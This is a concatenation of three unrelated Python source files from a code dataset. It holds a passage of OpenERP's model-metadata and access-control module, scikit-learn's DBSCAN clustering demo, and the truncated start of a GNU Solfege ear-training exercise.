_('Properties of base fields cannot be altered in this manner! '
'Please modify them through Python code, '
'preferably through a custom addon!'))
if item.ttype == 'selection' and 'selection' in vals \
and not checked_selection:
self._check_selection(cr, user, vals['selection'], context=context)
checked_selection = True
final_name = item.name
if 'name' in vals and vals['name'] != item.name:
# We need to rename the column
if column_rename:
raise except_orm(_('Error!'), _('Can only rename one column at a time!'))
if vals['name'] in obj._columns:
raise except_orm(_('Error!'), _('Cannot rename column to %s, because that column already exists!') % vals['name'])
if vals.get('state', 'manual') == 'manual' and not vals['name'].startswith('x_'):
                        raise except_orm(_('Error!'), _('New column name must still start with x_, because it is a custom field!'))
if '\'' in vals['name'] or '"' in vals['name'] or ';' in vals['name']:
raise ValueError('Invalid character in column name')
column_rename = (obj, (obj._table, item.name, vals['name']))
final_name = vals['name']
if 'model_id' in vals and vals['model_id'] != item.model_id.id:
raise except_orm(_("Error!"), _("Changing the model of a field is forbidden!"))
if 'ttype' in vals and vals['ttype'] != item.ttype:
raise except_orm(_("Error!"), _("Changing the type of a column is not yet supported. "
"Please drop it and create it again!"))
# We don't check the 'state', because it might come from the context
# (thus be set for multiple fields) and will be ignored anyway.
if obj is not None and field is not None:
patched_models.add(obj._name)
# These shall never be written (modified)
for column_name in ('model_id', 'model', 'state'):
if column_name in vals:
del vals[column_name]
res = super(ir_model_fields,self).write(cr, user, ids, vals, context=context)
self.pool.clear_manual_fields()
if column_rename:
obj, rename = column_rename
cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s"' % rename)
if column_rename or patched_models:
# setup models, this will reload all manual fields in registry
self.pool.setup_models(cr, partial=(not self.pool.ready))
if patched_models:
# We have to update _columns of the model(s) and then call their
# _auto_init to sync the db with the model. Hopefully, since write()
# was called earlier, they will be in-sync before the _auto_init.
# Anything we don't update in _columns now will be reset from
# the model into ir.model.fields (db).
ctx = dict(context,
select=vals.get('select_level', '0'),
update_custom_fields=True,
)
for model_name in patched_models:
obj = self.pool[model_name]
obj._auto_init(cr, ctx)
obj._auto_end(cr, ctx) # actually create FKs!
if column_rename or patched_models:
RegistryManager.signal_registry_change(cr.dbname)
return res
class ir_model_constraint(Model):
"""
This model tracks PostgreSQL foreign keys and constraints used by OpenERP
models.
"""
_name = 'ir.model.constraint'
_columns = {
'name': fields.char('Constraint', required=True, select=1,
help="PostgreSQL constraint or foreign key name."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'type': fields.char('Constraint Type', required=True, size=1, select=1,
help="Type of the constraint: `f` for a foreign key, "
"`u` for other constraints."),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)',
'Constraints with the same name are unique per module.'),
]
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL foreign keys and constraints tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
ids_set = set(ids)
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model.model
if model in self.pool:
table = self.pool[model]._table
else:
table = model.replace('.', '_')
name = openerp.tools.ustr(data.name)
typ = data.type
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_constraint where name=%s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
if typ == 'f':
# test if FK exists on this table (it could be on a related m2m table, in which case we ignore it)
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('f', name, table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (table, name),)
_logger.info('Dropped FK CONSTRAINT %s@%s', name, model)
if typ == 'u':
# test if constraint exists
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('u', name, table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (table, name),)
_logger.info('Dropped CONSTRAINT %s@%s', name, model)
self.unlink(cr, uid, ids, context)
class ir_model_relation(Model):
"""
This model tracks PostgreSQL tables used to implement OpenERP many2many
relations.
"""
_name = 'ir.model.relation'
_columns = {
'name': fields.char('Relation Name', required=True, select=1,
help="PostgreSQL table name implementing a many2many relation."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL many2many relations tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
ids_set = set(ids)
to_drop_table = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
name = openerp.tools.ustr(data.name)
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_relation where name = %s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
cr.execute("SELECT 1 FROM information_schema.tables WHERE table_name=%s", (name,))
if cr.fetchone() and not name in to_drop_table:
to_drop_table.append(name)
self.unlink(cr, uid, ids, context)
# drop m2m relation tables
for table in to_drop_table:
cr.execute('DROP TABLE %s CASCADE'% table,)
_logger.info('Dropped table %s', table)
cr.commit()
class ir_model_access(osv.osv):
_name = 'ir.model.access'
_columns = {
'name': fields.char('Name', required=True, select=True),
        'active': fields.boolean('Active', help='If you uncheck the active field, it will disable the ACL without deleting it (if you delete a native ACL, it will be re-created when you reload the module).'),
'model_id': fields.many2one('ir.model', 'Object', required=True, domain=[('osv_memory','=', False)], select=True, ondelete='cascade'),
'group_id': fields.many2one('res.groups', 'Group', ondelete='cascade', select=True),
'perm_read': fields.boolean('Read Access'),
'perm_write': fields.boolean('Write Access'),
'perm_create': fields.boolean('Create Access'),
'perm_unlink': fields.boolean('Delete Access'),
}
_defaults = {
'active': True,
}
def check_groups(self, cr, uid, group):
grouparr = group.split('.')
if not grouparr:
return False
cr.execute("select 1 from res_groups_users_rel where uid=%s and gid IN (select res_id from ir_model_data where module=%s and name=%s)", (uid, grouparr[0], grouparr[1],))
return bool(cr.fetchone())
def check_group(self, cr, uid, model, mode, group_ids):
""" Check if a specific group has the access mode to the specified model"""
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.name
else:
model_name = model
if isinstance(group_ids, (int, long)):
group_ids = [group_ids]
for group_id in group_ids:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id = %s", (model_name, group_id)
)
r = cr.fetchone()
if r is None:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id IS NULL", (model_name, )
)
r = cr.fetchone()
access = bool(r and r[0])
if access:
return True
# pass no groups -> no access
return False
def group_names_with_access(self, cr, model_name, access_mode):
"""Returns the names of visible groups which have been granted ``access_mode`` on
the model ``model_name``.
:rtype: list
"""
assert access_mode in ['read','write','create','unlink'], 'Invalid access mode: %s' % access_mode
cr.execute('''SELECT
c.name, g.name
FROM
ir_model_access a
JOIN ir_model m ON (a.model_id=m.id)
JOIN res_groups g ON (a.group_id=g.id)
LEFT JOIN ir_module_category c ON (c.id=g.category_id)
WHERE
m.model=%s AND
a.active IS True AND
a.perm_''' + access_mode, (model_name,))
return [('%s/%s' % x) if x[0] else x[1] for x in cr.fetchall()]
# The context parameter is useful when the method translates error messages.
# But as the method raises an exception in that case, the key 'lang' might
# not be really necessary as a cache key, unless the `ormcache_context`
    # decorator catches the exception (it does not at the moment).
@tools.ormcache_context(accepted_keys=('lang',))
def check(self, cr, uid, model, mode='read', raise_exception=True, context=None):
if uid==1:
            # User root has all access rights
# TODO: exclude xml-rpc requests
return True
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.model
else:
model_name = model
# TransientModel records have no access rights, only an implicit access rule
if model_name not in self.pool:
_logger.error('Missing model %s' % (model_name, ))
elif self.pool[model_name].is_transient():
return True
# We check if a specific rule exists
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' JOIN res_groups_users_rel gu ON (gu.gid = a.group_id) '
' WHERE m.model = %s '
' AND gu.uid = %s '
' AND a.active IS True '
, (model_name, uid,)
)
r = cr.fetchone()[0]
if r is None:
# there is no specific rule. We check the generic rule
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' WHERE a.group_id IS NULL '
' AND m.model = %s '
' AND a.active IS True '
, (model_name,)
)
r = cr.fetchone()[0]
if not r and raise_exception:
groups = '\n\t'.join('- %s' % g for g in self.group_names_with_access(cr, model_name, mode))
msg_heads = {
# Messages are declared in extenso so they are properly exported in translation terms
'read': _("Sorry, you are not allowed to access this document."),
'write': _("Sorry, you are not allowed to modify this document."),
'create': _("Sorry, you are not allowed to create this kind of document."),
'unlink': _("Sorry, you are not allowed to delete this document."),
}
if groups:
msg_tail = _("Only users with the following access level are currently allowed to do that") + ":\n%s\n\n(" + _("Document model") + ": %s)"
msg_params = (groups, model_name)
else:
msg_tail = _("Please contact your system administrator if you think this is an error.") + "\n\n(" + _("Document model") + ": %s)"
msg_params = (model_name,)
_logger.warning('Access Denied by ACLs for operation: %s, uid: %s, model: %s', mode, uid, model_name)
msg = '%s %s' % (msg_heads[mode], msg_tail)
raise openerp.exceptions.AccessError(msg % msg_params)
return bool(r)
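    # Resolution order used above (explanatory sketch, not part of the
    # original source): ACL lines attached to one of the user's groups are
    # consulted first; only when no such line exists at all (r is None rather
    # than 0) do we fall back to the global lines with group_id IS NULL.
    # MAX() makes a single permissive line win over any number of
    # restrictive ones.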
__cache_clearing_methods = []
def register_cache_clearing_method(self, model, method):
self.__cache_clearing_methods.append((model, method))
def unregister_cache_clearing_method(self, model, method):
try:
i = self.__cache_clearing_methods.index((model, method))
del self.__cache_clearing_methods[i]
except ValueError:
pass
def call_cache_clearing_methods(self, cr):
self.invalidate_cache(cr, SUPERUSER_ID)
self.check.clear_cache(self) # clear the cache of check function
for model, method in self.__cache_clearing_methods:
if model in self.pool:
getattr(self.pool[model], method)()
#
# Check rights on actions
#
def write(self, cr, uid, ids, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).write(cr, uid, ids, values, context=context)
return res
def create(self, cr, uid, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).create(cr, uid, values, context=context)
return res
def unlink(self, cr, uid, ids, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).unlink(cr, uid, ids, context=context)
return res
class ir_model_data(osv.osv):
"""Holds external identifier keys for records in the database.
This has two main uses:
* allows easy data integration with third-party systems,
making import/export/sync of data possible, as records
can be uniquely identified across multiple systems
* allows tracking the origin of data installed by OpenERP
modules themselves, thus making it possible to later
update them seamlessly.
"""
_name = 'ir.model.data'
_order = 'module,model,name'
def name_get(self, cr, uid, ids, context=None):
bymodel = defaultdict(dict)
names = {}
for res in self.browse(cr, uid, ids, context=context):
bymodel[res.model][res.res_id] = res
names[res.id] = res.complete_name
#result[res.model][res.res_id] = res.id
for model, id_map in bymodel.iteritems():
try:
ng = dict(self.pool[model].name_get(cr, uid, id_map.keys(), context=context))
except Exception:
pass
else:
for r in id_map.itervalues():
names[r.id] = ng.get(r.res_id, r.complete_name)
return [(i, names[i]) for i in ids]
def _complete_name_get(self, cr, uid, ids, prop, unknow_none, context=None):
result = {}
for res in self.browse(cr, uid, ids, context=context):
result[res.id] = (res.module and (res.module + '.') or '')+res.name
return result
_columns = {
'name': fields.char('External Identifier', required=True, select=1,
help="External Key/Identifier that can be used for "
"data integration with third-party systems"),
'complete_name': fields.function(_complete_name_get, type='char', string='Complete ID'),
'model': fields.char('Model Name', required=True, select=1),
'module': fields.char('Module', required=True, select=1),
'res_id': fields.integer('Record ID', select=1,
help="ID of the target record in the database"),
'noupdate': fields.boolean('Non Updatable'),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Init Date')
}
_defaults = {
'date_init': fields.datetime.now,
'date_update': fields.datetime.now,
'noupdate': False,
'module': ''
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)', 'You cannot have multiple records with the same external ID in the same module!'),
]
def __init__(self, pool, cr):
osv.osv.__init__(self, pool, cr)
# also stored in pool to avoid being discarded along with this osv instance
if getattr(pool, 'model_data_reference_ids', None) is None:
self.pool.model_data_reference_ids = {}
# put loads on the class, in order to share it among all instances
type(self).loads = self.pool.model_data_reference_ids
def _auto_init(self, cr, context=None):
res = super(ir_model_data, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'ir_model_data_module_name_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX ir_model_data_module_name_index ON ir_model_data (module, name)')
return res
# NEW V8 API
@tools.ormcache(skiparg=3)
def xmlid_lookup(self, cr, uid, xmlid):
"""Low level xmlid lookup
Return (id, res_model, res_id) or raise ValueError if not found
"""
module, name = xmlid.split('.', 1)
ids = self.search(cr, uid, [('module','=',module), ('name','=', name)])
if not ids:
raise ValueError('External ID not found in the system: %s' % (xmlid))
# the sql constraints ensure us we have only one result
res = self.read(cr, uid, ids[0], ['model', 'res_id'])
if not res['res_id']:
raise ValueError('External ID not found in the system: %s' % (xmlid))
return ids[0], res['model'], res['res_id']
def xmlid_to_res_model_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Return (res_model, res_id)"""
try:
return self.xmlid_lookup(cr, uid, xmlid)[1:3]
except ValueError:
if raise_if_not_found:
raise
return (False, False)
def xmlid_to_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Returns res_id """
return self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)[1]
def xmlid_to_object(self, cr, uid, xmlid, raise_if_not_found=False, context=None):
""" Return a browse_record
if not found and raise_if_not_found is True return None
"""
t = self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)
res_model, res_id = t
if res_model and res_id:
record = self.pool[res_model].browse(cr, uid, res_id, context=context)
if record.exists():
return record
if raise_if_not_found:
raise ValueError('No record found for unique ID %s. It may have been deleted.' % (xmlid))
return None
# OLD API
def _get_id(self, cr, uid, module, xml_id):
"""Returns the id of the ir.model.data record corresponding to a given module and xml_id (cached) or raise a ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[0]
def get_object_reference(self, cr, uid, module, xml_id):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached) or raise ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[1:3]
def check_object_reference(self, cr, uid, module, xml_id, raise_on_access_error=False):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached), if and only if the user has the necessary access rights
to see that object, otherwise raise a ValueError if raise_on_access_error is True or returns a tuple (model found, False)"""
model, res_id = self.get_object_reference(cr, uid, module, xml_id)
#search on id found in result to check if current user has read access right
check_right = self.pool.get(model).search(cr, uid, [('id', '=', res_id)])
if check_right:
return model, res_id
if raise_on_access_error:
raise ValueError('Not enough access rights on the external ID: %s.%s' % (module, xml_id))
return model, False
def get_object(self, cr, uid, module, xml_id, context=None):
""" Returns a browsable record for the given module name and xml_id.
If not found, raise a ValueError or return None, depending
on the value of `raise_exception`.
"""
return self.xmlid_to_object(cr, uid, "%s.%s" % (module, xml_id), raise_if_not_found=True, context=context)
def _update_dummy(self,cr, uid, model, module, xml_id=False, store=True):
if not xml_id:
return False
id = False
try:
# One step to check the ID is defined and the record actually exists
record = self.get_object(cr, uid, module, xml_id)
if record:
id = record.id
self.loads[(module,xml_id)] = (model,id)
for table, inherit_field in self.pool[model]._inherits.iteritems():
parent_id = record[inherit_field].id
parent_xid = '%s_%s' % (xml_id, table.replace('.', '_'))
self.loads[(module, parent_xid)] = (table, parent_id)
except Exception:
pass
return id
def clear_caches(self):
""" Clears all orm caches on the object's methods
:returns: itself
"""
self.xmlid_lookup.clear_cache(self)
return self
def unlink(self, cr, uid, ids, context=None):
""" Regular unlink method, but make sure to clear the caches. """
self.clear_caches()
return super(ir_model_data,self).unlink(cr, uid, ids, context=context)
def _update(self,cr, uid, model, module, values, xml_id=False, store=True, noupdate=False, mode='init', res_id=False, context=None):
model_obj = self.pool[model]
if not context:
context = {}
# records created during module install should not display the messages of OpenChatter
context = dict(context, install_mode=True)
if xml_id and ('.' in xml_id):
            assert len(xml_id.split('.'))==2, _("'%s' contains too many dots. XML ids should not contain dots! These are used to refer to other modules' data, as in module.reference_id") % xml_id
module, xml_id = xml_id.split('.')
action_id = False
if xml_id:
cr.execute('''SELECT imd.id, imd.res_id, md.id, imd.model, imd.noupdate
FROM ir_model_data imd LEFT JOIN %s md ON (imd.res_id = md.id)
WHERE imd.module=%%s AND imd.name=%%s''' % model_obj._table,
(module, xml_id))
results = cr.fetchall()
for imd_id2,res_id2,real_id2,real_model,noupdate_imd in results:
                # In update mode, do not update a record if its ir.model.data is flagged as noupdate
if mode == 'update' and noupdate_imd:
return res_id2
if not real_id2:
self.clear_caches()
cr.execute('delete from ir_model_data where id=%s', (imd_id2,))
res_id = False
else:
assert model == real_model, "External ID conflict, %s already refers to a `%s` record,"\
" you can't define a `%s` record with this ID." % (xml_id, real_model, model)
res_id,action_id = res_id2,imd_id2
if action_id and res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
self.write(cr, SUPERUSER_ID, [action_id], {
'date_update': time.strftime('%Y-%m-%d %H:%M:%S'),
},context=context)
elif res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, SUPERUSER_ID, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, SUPERUSER_ID, {
'name': xml_id,
'model': model,
'module':module,
'res_id':res_id,
'noupdate': noupdate,
},context=context)
else:
if mode=='init' or (mode=='update' and xml_id):
inherit_xml_ids = []
if xml_id:
for table, field_name in model_obj._inherits.items():
xml_ids = self.pool['ir.model.data'].search(cr, uid, [
('module', '=', module),
('name', '=', xml_id + '_' + table.replace('.', '_')),
], context=context)
# XML ID found in the database, try to recover an existing record
if xml_ids:
found_xml_id = self.pool['ir.model.data'].browse(cr, uid, xml_ids[0], context=context)
record = self.pool[found_xml_id.model].browse(cr, uid, [found_xml_id.res_id], context=context)[0]
# The record exists, store the id and don't recreate the XML ID
if record.exists():
inherit_xml_ids.append(found_xml_id.model)
values[field_name] = found_xml_id.res_id
# Orphan XML ID, delete it
else:
found_xml_id.unlink()
res_id = model_obj.create(cr, uid, values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
if table in inherit_xml_ids:
continue
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, SUPERUSER_ID, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, SUPERUSER_ID, {
'name': xml_id,
'model': model,
'module': module,
'res_id': res_id,
'noupdate': noupdate
},context=context)
if xml_id and res_id:
self.loads[(module, xml_id)] = (model, res_id)
for table, inherit_field in model_obj._inherits.iteritems():
inherit_id = model_obj.read(cr, uid, [res_id],
[inherit_field])[0][inherit_field]
self.loads[(module, xml_id + '_' + table.replace('.', '_'))] = (table, inherit_id)
return res_id
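    # Flow summary for _update() (a sketch, not part of the original source):
    # mode='init' creates missing records, while mode='update' leaves records
    # alone when their ir.model.data entry is flagged noupdate. Records of
    # models using _inherits also get companion external ids for their parent
    # records, named '<xml_id>_<parent_table_with_underscores>'.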
def ir_set(self, cr, uid, key, key2, name, models, value, replace=True, isobject=False, meta=None, xml_id=False):
ir_values_obj = openerp.registry(cr.dbname)['ir.values']
ir_values_obj.set(cr, uid, key, key2, name, models, value, replace, isobject, meta)
return True
def _module_data_uninstall(self, cr, uid, modules_to_remove, context=None):
"""Deletes all the records referenced by the ir.model.data entries
``ids`` along with their corresponding database backed (including
dropping tables, columns, FKs, etc, as long as there is no other
ir.model.data entry holding a reference to them (which indicates that
they are still owned by another module).
Attempts to perform the deletion in an appropriate order to maximize
the chance of gracefully deleting all records.
This step is performed as part of the full uninstallation of a module.
"""
ids = self.search(cr, uid, [('module', 'in', modules_to_remove)])
if uid != 1 and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
context[MODULE_UNINSTALL_FLAG] = True # enable model/field deletion
ids_set = set(ids)
wkf_todo = []
to_unlink = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
res_id = data.res_id
pair_to_unlink = (model, res_id)
if pair_to_unlink not in to_unlink:
to_unlink.append(pair_to_unlink)
if model == 'workflow.activity':
# Special treatment for workflow activities: temporarily revert their
# incoming transition and trigger an update to force all workflow items
# to move out before deleting them
cr.execute('select res_type,res_id from wkf_instance where id IN (select inst_id from wkf_workitem where act_id=%s)', (res_id,))
wkf_todo.extend(cr.fetchall())
cr.execute("update wkf_transition set condition='True', group_id=NULL, signal=NULL,act_to=act_from,act_from=%s where act_to=%s", (res_id,res_id))
self.invalidate_cache(cr, uid, context=context)
for model,res_id in wkf_todo:
try:
openerp.workflow.trg_write(uid, model, res_id, cr)
except Exception:
_logger.info('Unable to force processing of workflow for item %s@%s in order to leave activity to be deleted', res_id, model, exc_info=True)
def unlink_if_refcount(to_unlink):
for model, res_id in to_unlink:
external_ids = self.search(cr, uid, [('model', '=', model),('res_id', '=', res_id)])
if set(external_ids)-ids_set:
# if other modules have defined this record, we must not delete it
continue
if model == 'ir.model.fields':
# Don't remove the LOG_ACCESS_COLUMNS unless _log_access
# has been turned off on the model.
field = self.pool[model].browse(cr, uid, [res_id], context=context)[0]
if not field.exists():
_logger.info('Deleting orphan external_ids %s', external_ids)
self.unlink(cr, uid, external_ids)
continue
if field.name in openerp.models.LOG_ACCESS_COLUMNS and self.pool[field.model]._log_access:
continue
if field.name == 'id':
continue
_logger.info('Deleting %s@%s', res_id, model)
try:
cr.execute('SAVEPOINT record_unlink_save')
self.pool[model].unlink(cr, uid, [res_id], context=context)
except Exception:
_logger.info('Unable to delete %s@%s', res_id, model, exc_info=True)
cr.execute('ROLLBACK TO SAVEPOINT record_unlink_save')
else:
cr.execute('RELEASE SAVEPOINT record_unlink_save')
# Remove non-model records first, then model fields, and finish with models
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model not in ('ir.model','ir.model.fields','ir.model.constraint'))
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.constraint')
ir_module_module = self.pool['ir.module.module']
ir_model_constraint = self.pool['ir.model.constraint']
modules_to_remove_ids = ir_module_module.search(cr, uid, [('name', 'in', modules_to_remove)], context=context)
constraint_ids = ir_model_constraint.search(cr, uid, [('module', 'in', modules_to_remove_ids)], context=context)
ir_model_constraint._module_data_uninstall(cr, uid, constraint_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.fields')
ir_model_relation = self.pool['ir.model.relation']
relation_ids = ir_model_relation.search(cr, uid, [('module', 'in', modules_to_remove_ids)])
ir_model_relation._module_data_uninstall(cr, uid, relation_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model')
cr.commit()
self.unlink(cr, uid, ids, context)
def _process_end(self, cr, uid, modules):
""" Clear records removed from updated module data.
This method is called at the end of the module loading process.
It is meant to removed records that are no longer present in the
updated data. Such records are recognised as the one with an xml id
and a module in ir_model_data and noupdate set to false, but not
present in self.loads.
"""
if not modules or config.get('import_partial'):
return True
bad_imd_ids = []
context = {MODULE_UNINSTALL_FLAG: True}
cr.execute("""SELECT id,name,model,res_id,module FROM ir_model_data
WHERE module IN %s AND res_id IS NOT NULL AND noupdate=%s ORDER BY id DESC
""", (tuple(modules), False))
for (id, name, model, res_id, module) in cr.fetchall():
if (module, name) not in self.loads:
if model in self.pool:
_logger.info('Deleting %s@%s (%s.%s)', res_id, model, module, name)
if self.pool[model].exists(cr, uid, [res_id], context=context):
self.pool[model].unlink(cr, uid, [res_id], context=context)
else:
bad_imd_ids.append(id)
if bad_imd_ids:
self.unlink(cr, uid, bad_imd_ids, context=context)
self.loads.clear()
class wizard_model_menu(osv.osv_memory):
_name = 'wizard.ir.model.menu.create'
_columns = {
'menu_id': fields.many2one('ir.ui.menu', 'Parent Menu', required=True),
'name': fields.char('Menu Name', required=True),
}
def menu_create(self, cr, uid, ids, context=None):
if not context:
context = {}
model_pool = self.pool.get('ir.model')
for menu in self.browse(cr, uid, ids, context):
model = model_pool.browse(cr, uid, context.get('model_id'), context=context)
val = {
'name': menu.name,
'res_model': model.model,
'view_type': 'form',
'view_mode': 'tree,form'
}
action_id = self.pool.get('ir.actions.act_window').create(cr, uid, val)
self.pool.get('ir.ui.menu').create(cr, uid, {
'name': menu.name,
'parent_id': menu.menu_id.id,
'action': 'ir.actions.act_window,%d' % (action_id,),
'icon': 'STOCK_INDENT'
}, context)
return {'type':'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
davidgbe/scikit-learn
|
refs/heads/master
|
examples/cluster/plot_dbscan.py
|
346
|
# -*- coding: utf-8 -*-
"""
===================================
Demo of DBSCAN clustering algorithm
===================================
Finds core samples of high density and expands clusters from them.
"""
print(__doc__)
import numpy as np
from sklearn.cluster import DBSCAN
from sklearn import metrics
from sklearn.datasets.samples_generator import make_blobs
from sklearn.preprocessing import StandardScaler
##############################################################################
# Generate sample data
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(n_samples=750, centers=centers, cluster_std=0.4,
random_state=0)
X = StandardScaler().fit_transform(X)
##############################################################################
# Compute DBSCAN
db = DBSCAN(eps=0.3, min_samples=10).fit(X)
core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
core_samples_mask[db.core_sample_indices_] = True
labels = db.labels_
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
print('Estimated number of clusters: %d' % n_clusters_)
print("Homogeneity: %0.3f" % metrics.homogeneity_score(labels_true, labels))
print("Completeness: %0.3f" % metrics.completeness_score(labels_true, labels))
print("V-measure: %0.3f" % metrics.v_measure_score(labels_true, labels))
print("Adjusted Rand Index: %0.3f"
% metrics.adjusted_rand_score(labels_true, labels))
print("Adjusted Mutual Information: %0.3f"
% metrics.adjusted_mutual_info_score(labels_true, labels))
print("Silhouette Coefficient: %0.3f"
% metrics.silhouette_score(X, labels))
##############################################################################
# Plot result
import matplotlib.pyplot as plt
# Black removed and is used for noise instead.
unique_labels = set(labels)
colors = plt.cm.Spectral(np.linspace(0, 1, len(unique_labels)))
for k, col in zip(unique_labels, colors):
if k == -1:
# Black used for noise.
col = 'k'
class_member_mask = (labels == k)
xy = X[class_member_mask & core_samples_mask]
plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=col,
markeredgecolor='k', markersize=14)
xy = X[class_member_mask & ~core_samples_mask]
plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=col,
markeredgecolor='k', markersize=6)
plt.title('Estimated number of clusters: %d' % n_clusters_)
plt.show()
|
yuanyelele/solfege
|
refs/heads/master
|
solfege/exercises/idtone.py
|
2
|
# GNU Solfege - free ear training software
# Copyright (C) 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2011 Tom Cato Amundsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import random
import os
from gi.repository import GObject
from gi.repository import Gtk
from solfege import abstract
from solfege import gu
from solfege import inputwidgets
from solfege import lessonfile
from solfege import mpd
from solfege import soundcard
from solfege import statistics, statisticsviewer
from solfege import utils
import solfege
class Teacher(abstract.Teacher):
#FIXME the following lines
OK, ERR_PICKY, ERR_TONES = range(3)
ERR_PICKY = 1
ERR_CONFIG = 2
OCTAVES = [-2, -1, 0, 1, 2, 3]
def __init__(self, exname):
abstract.Teacher.__init__(self, exname)
self.lessonfileclass = lessonfile.HeaderLessonfile
self.m_statistics = statistics.IdToneStatistics(self)
self.m_ask_tones = {}
self.m_question = None
